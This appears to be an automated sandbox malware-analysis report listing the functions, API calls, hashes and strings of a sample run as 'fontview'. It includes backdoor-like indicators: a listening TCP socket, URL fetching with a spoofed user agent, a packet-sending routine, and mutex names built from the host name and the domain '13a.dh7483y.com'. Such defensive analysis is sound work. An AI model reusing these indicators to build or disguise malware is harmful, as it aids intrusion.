Instruction Fuzzy Hash: E2F06771208349AEE354CF69D401B16F7E8EF153A5F20842EE449CB291EBB6E8418BA1

Function 100094E7 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 100094FC

Part of subcall function 10033984: RtlFreeHeap.NTDLL(00000000,00000000,?,10008C33,?,?,100092B7,?,?,?,1000A450,?,?,?,?,?), ref: 10033998
Part of subcall function 10033984: GetLastError.KERNEL32(?,?,10008C33,?,?,100092B7,?,?,?,1000A450,?,?,?,?,?), ref: 100339AA

Memory Dump Source

Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_fontview.jbxd

Yara matches

Similarity

API ID: ErrorFreeHeapLast_free
String ID:
API String ID: 1353095263-0
Opcode ID: acc1673d6148918c8941476ad3de64f7cc372316590d711c9c2354f11ed99ff7
Instruction ID: d8f828a40b2b730194e8aba937afc0051e5cb378dd47fda6167a8c8fdc332205
Opcode Fuzzy Hash: acc1673d6148918c8941476ad3de64f7cc372316590d711c9c2354f11ed99ff7
Instruction Fuzzy Hash: 83F058325045139FE712DB1AE840F95F7E4EF907A2B224126E504A71A9CB30BCA1CBE0

Function 10009053 Relevance: 1.5, APIs: 1, Instructions: 28COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 10009058

Part of subcall function 10009005: __EH_prolog.LIBCMT ref: 1000900A

Memory Dump Source

Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_fontview.jbxd

Yara matches

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 8f174c59e55ee46aa1a0518bf9910ef7bcc233a2a1d8cc6bb2ecf2f82cef4e6c
Instruction ID: c6297489b9343aa14daceb2b23b854b15629787c9eaf3216ec455666ea5a6765
Opcode Fuzzy Hash: 8f174c59e55ee46aa1a0518bf9910ef7bcc233a2a1d8cc6bb2ecf2f82cef4e6c
Instruction Fuzzy Hash: 2DF0DA76900649AFDF01CFE8C801ADEB7B1FF48354F004425EA01E3211D7399A149BA5

Function 10009005 Relevance: 1.5, APIs: 1, Instructions: 27COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 1000900A

Memory Dump Source

Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_fontview.jbxd

Yara matches

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 082614ae51f8eaab92f8fd4fcbd49f14c1e35ad109d2f292faef18787c312c3c
Instruction ID: d8b04152d89935f80a21dc8e5be05f0eecfdb8387a64987abe8c677b8d63aa7e
Opcode Fuzzy Hash: 082614ae51f8eaab92f8fd4fcbd49f14c1e35ad109d2f292faef18787c312c3c
Instruction Fuzzy Hash: 82F0F2B6A04649AFEB01CFA8C501ADEB7B5EB08314F104466E901F7261D735AE158B66

Function 1001A146 Relevance: 1.5, APIs: 1, Instructions: 25COMMONLIBRARYCODE

Download Yara Rule

APIs

_malloc.LIBCMT ref: 1001A17E

Part of subcall function 100339BC: __FF_MSGBANNER.LIBCMT ref: 100339D3
Part of subcall function 100339BC: __NMSG_WRITE.LIBCMT ref: 100339DA
Part of subcall function 100339BC: RtlAllocateHeap.NTDLL(00B70000,00000000,00000001,00000000,?,00000000,?,10039271,00000000,00000000,00000000,?,?,10037A2F,00000018,1005F658), ref: 100339FF

Memory Dump Source

Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_fontview.jbxd

Yara matches

Similarity

API ID: AllocateHeap_malloc
String ID:
API String ID: 501242067-0
Opcode ID: 2c2698d9046910f35f71d844e2ee760e71884a89bdce3fdce241900a1686537b
Instruction ID: 36140bd552ea7598696e433675d61f7601ae88bce914a68567ec45485bf916f3
Opcode Fuzzy Hash: 2c2698d9046910f35f71d844e2ee760e71884a89bdce3fdce241900a1686537b
Instruction Fuzzy Hash: BCF0D4B190AB908FC378CF29A541203FBE0AB187107108E2FE0EAC7B80D3B0A444CF58

Function 1001E093 Relevance: 1.5, APIs: 1, Instructions: 24threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,1001C9A2,?,00000000,00000000), ref: 1001E0C3

Part of subcall function 1001E1A7: closesocket.WS2_32(?), ref: 1001E1BD
Part of subcall function 1001E1A7: closesocket.WS2_32(?), ref: 1001E1C8
Part of subcall function 1001E1A7: closesocket.WS2_32(?), ref: 1001E1D4
Part of subcall function 1001E1A7: Sleep.KERNELBASE(00000064,?,?,?,10007547,?,1000682B,?,?,?), ref: 1001E1EE
Part of subcall function 1001E1A7: TerminateThread.KERNELBASE(?,00000000,?,10007547,?,1000682B,?,?,?), ref: 1001E1F5
Part of subcall function 1001E1A7: CloseHandle.KERNEL32(?,?,10007547,?,1000682B,?,?,?), ref: 1001E1FA
Part of subcall function 1001E1A7: Sleep.KERNEL32(00000064,?,?,?,10007547,?,1000682B,?,?,?), ref: 1001E20C
Part of subcall function 1001E1A7: TerminateThread.KERNELBASE(?,00000000,?,10007547,?,1000682B,?,?,?), ref: 1001E213
Part of subcall function 1001E1A7: CloseHandle.KERNEL32(?,?,10007547,?,1000682B,?,?,?), ref: 1001E218
Part of subcall function 1001E1A7: Sleep.KERNEL32(00000064,?,?,?,10007547,?,1000682B,?,?,?), ref: 1001E22A
Part of subcall function 1001E1A7: TerminateThread.KERNELBASE(?,00000000,?,10007547,?,1000682B,?,?,?), ref: 1001E231
Part of subcall function 1001E1A7: CloseHandle.KERNEL32(?,?,10007547,?,1000682B,?,?,?), ref: 1001E236
Part of subcall function 1001E1A7: Sleep.KERNEL32(00000064,?,?,?,10007547,?,1000682B,?,?,?), ref: 1001E248
Part of subcall function 1001E1A7: TerminateThread.KERNELBASE(?,00000000,?,10007547,?,1000682B,?,?,?), ref: 1001E24F
Part of subcall function 1001E1A7: CloseHandle.KERNEL32(?,?,10007547,?,1000682B,?,?,?), ref: 1001E254
Part of subcall function 1001E1A7: Sleep.KERNELBASE ref: 1001E26F

Memory Dump Source

Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_fontview.jbxd

Yara matches

Similarity

API ID: SleepThread$CloseHandleTerminate$closesocket$Create
String ID:
API String ID: 4110853011-0
Opcode ID: 087594ae852631b1769bd4bec608cb617506a2bc0a30da82affd88f2c824ebc1
Instruction ID: 6a280082d855df33ede7dbe1d76fd2287fd5124dc276dd059ab29f99ddadefcf
Opcode Fuzzy Hash: 087594ae852631b1769bd4bec608cb617506a2bc0a30da82affd88f2c824ebc1
Instruction Fuzzy Hash: 34E04874406BD16DF362D235894876B6ECCDF45354F45146DE483C7942D6B4FCC48761

Function 1001A1AC Relevance: 1.5, APIs: 1, Instructions: 16COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 1001A1BE

Part of subcall function 10033984: RtlFreeHeap.NTDLL(00000000,00000000,?,10008C33,?,?,100092B7,?,?,?,1000A450,?,?,?,?,?), ref: 10033998
Part of subcall function 10033984: GetLastError.KERNEL32(?,?,10008C33,?,?,100092B7,?,?,?,1000A450,?,?,?,?,?), ref: 100339AA

Memory Dump Source

Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_fontview.jbxd

Yara matches

Similarity

API ID: ErrorFreeHeapLast_free
String ID:
API String ID: 1353095263-0
Opcode ID: c4f720c0c7b723e6038e199acd1e74adfd93ace1d065f47373bb1268fbd76b58
Instruction ID: 93ea723e0ff4a37ebefb55af8edc70bf2818af01715938430097f1e814cd421c
Opcode Fuzzy Hash: c4f720c0c7b723e6038e199acd1e74adfd93ace1d065f47373bb1268fbd76b58
Instruction Fuzzy Hash: 80E0B635040B10DED335DA14D4517EAB7E0EF14355F10881ED083068959BB5B4898B40

Function 10033C98 Relevance: 1.5, APIs: 1, Instructions: 9COMMONLIBRARYCODE

Download Yara Rule

APIs

__fsopen.LIBCMT ref: 10033CA3

Memory Dump Source

Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_fontview.jbxd

Yara matches

Similarity

API ID: __fsopen
String ID:
API String ID: 3646066109-0
Opcode ID: bf5cddf6cdcf292e93ea6723c994e088edc5db0ae513d1c80474abae1941b879
Instruction ID: 13b5a6f81be809b2fbf7d3c091e96eb276c097e301d156e73de4e88552a403f5
Opcode Fuzzy Hash: bf5cddf6cdcf292e93ea6723c994e088edc5db0ae513d1c80474abae1941b879
Instruction Fuzzy Hash: 60B0927654020C7BDE021E82EC02B49BB199B40665F008020FB0C1C261AA73A6A09689

Function 1000D52D Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00000064), ref: 1000D543

Memory Dump Source

Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_fontview.jbxd

Yara matches

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 3dcde9034596774b65aa007e54195beb177a1c6bf47b1e63de3ded5947083681
Instruction ID: 41bad7438e7423b750e1fa2d8fabe618bb1bd2ce65775e71a8698d2292646254
Opcode Fuzzy Hash: 3dcde9034596774b65aa007e54195beb177a1c6bf47b1e63de3ded5947083681
Instruction Fuzzy Hash: 6BD0A53151491457F714A775DC0669E339CD700255F000356FC55531D4DF707D50C6D5

Non-executed Functions

Function 10022490 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 128networkCOMMON

Download Yara Rule

APIs

socket.WS2_32(?,00000001,00000006), ref: 100224D7
ioctlsocket.WS2_32(?,8004667E,?), ref: 10022520
bind.WS2_32(?,00000002,0000001C), ref: 10022540
SetLastError.KERNEL32(00000000), ref: 10022551
listen.WS2_32(?,?), ref: 1002256F
WSAGetLastError.WS2_32 ref: 100225A7
GetLastError.KERNEL32 ref: 100225C5
SetLastError.KERNEL32 ref: 100225DD

Strings

0.0.0.0, xrefs: 100224A5
CTcpServer::CreateListenSocket, xrefs: 100225AE

Memory Dump Source

Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_fontview.jbxd

Yara matches

Similarity

API ID: ErrorLast$bindioctlsocketlistensocket
String ID: 0.0.0.0$CTcpServer::CreateListenSocket
API String ID: 2417606085-4023130488
Opcode ID: f9bfeb4a8cc739fafcd06cefcd0780e203ae39d7abe803c851bd641ea0665de6
Instruction ID: 0924c4b3d37fc36c10ea38e20b5c0763d1d4709caa76c9637eac185a656b50da
Opcode Fuzzy Hash: f9bfeb4a8cc739fafcd06cefcd0780e203ae39d7abe803c851bd641ea0665de6
Instruction Fuzzy Hash: 4F41B170500714AFE710EFB4E849B6BB7E9FF44305F40891EF846C6690EB75A814CB91

Function 10006376 Relevance: 6.1, APIs: 4, Instructions: 149sleepCOMMON

Download Yara Rule

APIs

__time64.LIBCMT ref: 1000648C
Sleep.KERNEL32(1005AFD8,?,00000000,00000000), ref: 100064C4
__time64.LIBCMT ref: 100064CB
__time64.LIBCMT ref: 10006498

Part of subcall function 1001B9CF: __EH_prolog.LIBCMT ref: 1001B9D4
Part of subcall function 1001B9CF: LocalAlloc.KERNEL32(00000040,?,1005D658,?,00000000,00000000,?,00000000,00000000), ref: 1001BA16
Part of subcall function 1001B9CF: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,?,?,00000000,00000000), ref: 1001BA35
Part of subcall function 1001B9CF: char_traits.LIBCPMT ref: 1001BA3C
Part of subcall function 1001B9CF: LocalFree.KERNEL32(00000000,00000000,00000000,?,000000FF,00000000,?,?,00000000,00000000), ref: 1001BA4C

Memory Dump Source

Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_fontview.jbxd

Yara matches

Similarity

API ID: __time64$Local$AllocByteCharFreeH_prologMultiSleepWidechar_traits
String ID:
API String ID: 1349466670-0
Opcode ID: 2cfedc5b6727c162afb21c75015c32cc16b9b3a06868d89c3dec54bdad2cfbfb
Instruction ID: 7cf599d640d092ba8d81afc26d70626d69daa3c1e3df8c3c9f01c42eb59162d8
Opcode Fuzzy Hash: 2cfedc5b6727c162afb21c75015c32cc16b9b3a06868d89c3dec54bdad2cfbfb
Instruction Fuzzy Hash: E851B374208741AFE724DF24CC95A9AB7E5FF85390F504A2DF09946196DB30B948CB62

Function 100154F5 Relevance: 31.7, APIs: 15, Strings: 3, Instructions: 164synchronizationCOMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 100154FA

Part of subcall function 1001C213: __EH_prolog.LIBCMT ref: 1001C218
Part of subcall function 1001C213: GetComputerNameA.KERNEL32(?,?), ref: 1001C273

Part of subcall function 10011419: __EH_prolog.LIBCMT ref: 1001141E

_sprintf.LIBCMT ref: 10015565
OpenMutexA.KERNEL32(00100000,00000000,?), ref: 100155D4
GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 100155DE
OpenMutexA.KERNEL32(00100000,00000000,?), ref: 10015605
GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 10015609
CreateMutexA.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?), ref: 10015634
CreateMutexA.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?), ref: 10015649
GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 10015650
ReleaseMutex.KERNEL32(?,?,?,?,?,?,?), ref: 10015665
CloseHandle.KERNEL32(?,?,?,?,?,?,?), ref: 10015673
ReleaseMutex.KERNEL32(?,?,?,?,?,?,?), ref: 1001567B
CloseHandle.KERNEL32(?,?,?,?,?,?,?), ref: 10015683

Strings

13a.dh7483y.com, xrefs: 10015554
%s%s%saz$%^$%@#sdfs_12, xrefs: 1001555F
sadfasdf, xrefs: 10015575, 1001557A, 10015582

Memory Dump Source

Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_fontview.jbxd

Yara matches

Similarity

API ID: Mutex$ErrorH_prologLast$CloseCreateHandleOpenRelease$ComputerName_sprintf
String ID: %s%s%saz$%^$%@#sdfs_12$13a.dh7483y.com$sadfasdf
API String ID: 2639461599-2215545067
Opcode ID: b16b4742c35ab07c610d918a26e68d810d87f54fbc90a7c4393e84a5bac5fafb
Instruction ID: e3f48761596626cd4d4354f5a4ff52278281e6d761e45354df657ce548eb757b
Opcode Fuzzy Hash: b16b4742c35ab07c610d918a26e68d810d87f54fbc90a7c4393e84a5bac5fafb
Instruction Fuzzy Hash: 575160B1900218EFEB11DFA4CC959EDBBBCEF08350F54042AE505A7152D771AA45CFA5

Function 1001045E Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 54networkCOMMON

Download Yara Rule

APIs

InternetOpenA.WININET(Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727),00000001,00000000,00000000,00000000), ref: 1001046F
GetLastError.KERNEL32(?,000001C8,?,10010B1D,?,?,000001C8,?), ref: 1001047B
_wprintf.LIBCMT ref: 10010487
InternetOpenUrlA.WININET(00000000,?,00000000,00000000,00000400,00000000), ref: 1001049C
GetLastError.KERNEL32(?,000001C8,?,10010B1D,?,?,000001C8,?), ref: 100104A6
_wprintf.LIBCMT ref: 100104B2
InternetCloseHandle.WININET(00000000), ref: 100104BA

Strings

InternetOpen error: %d, xrefs: 10010482
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727), xrefs: 1001046A
InternetOpenUrl error: %d, xrefs: 100104AD

Memory Dump Source

Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_fontview.jbxd

Yara matches

Similarity

API ID: Internet$ErrorLastOpen_wprintf$CloseHandle
String ID: InternetOpen error: %d$InternetOpenUrl error: %d$Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727)
API String ID: 4184951356-3019792808
Opcode ID: 1c53bb0bbcba253483e6f0b9edd707838fdf13d34a631c261df6a1bcb328a2f6
Instruction ID: fdd271cfc1952d43686e52e3cb2134a55a55c06e4c3b67e23485a96a698a7243
Opcode Fuzzy Hash: 1c53bb0bbcba253483e6f0b9edd707838fdf13d34a631c261df6a1bcb328a2f6
Instruction Fuzzy Hash: FE018F722015347BE720A7F59C8DDAB7F1CEF426B1F118109FB0896260DA609840C6E5

Function 1000800D Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 208COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 10008012
htonl.WS2_32(?), ref: 10008068
__time64.LIBCMT ref: 100080A5
htonl.WS2_32(00000017), ref: 1000821E
htonl.WS2_32(?), ref: 10008224
htonl.WS2_32(?), ref: 10008233
htonl.WS2_32(?), ref: 1000823B
_malloc.LIBCMT ref: 10008241

Part of subcall function 100339BC: __FF_MSGBANNER.LIBCMT ref: 100339D3
Part of subcall function 100339BC: __NMSG_WRITE.LIBCMT ref: 100339DA
Part of subcall function 100339BC: RtlAllocateHeap.NTDLL(00B70000,00000000,00000001,00000000,?,00000000,?,10039271,00000000,00000000,00000000,?,?,10037A2F,00000018,1005F658), ref: 100339FF

_memmove.LIBCMT ref: 1000826B
_free.LIBCMT ref: 1000828D

Strings

Send Context:%s,time:%d,rand:%d, xrefs: 10008092

Memory Dump Source

Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_fontview.jbxd

Yara matches

Similarity

API ID: htonl$AllocateH_prologHeap__time64_free_malloc_memmove
String ID: Send Context:%s,time:%d,rand:%d
API String ID: 1013815920-2080267509
Opcode ID: cc96466e7b5b643448b77696e3deac728f8ff4df366bb23863d18f6bec68f1f4
Instruction ID: 5ef619c4959f7fe7b54a5c6b697cdb2a2ac42440dc1d89eb5a562cbe716d77b1
Opcode Fuzzy Hash: cc96466e7b5b643448b77696e3deac728f8ff4df366bb23863d18f6bec68f1f4
Instruction Fuzzy Hash: 09814875D00219EFEF15DFA4C891AEEBBB9FF14350F50406AE40A67142DB30AA85CF60

Function 100032F8 Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 340COMMONLIBRARYCODE

Download Yara Rule

APIs

_memmove.LIBCMT ref: 100033BD
_memmove.LIBCMT ref: 100033F4
_memmove.LIBCMT ref: 10003429
_memmove.LIBCMT ref: 100034B1
_memmove.LIBCMT ref: 10003528
_memmove.LIBCMT ref: 1000358E
_memmove.LIBCMT ref: 100035D2
_memmove.LIBCMT ref: 1000360C

Strings

invalid string position, xrefs: 1000363C
string too long, xrefs: 10003632

Memory Dump Source

Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
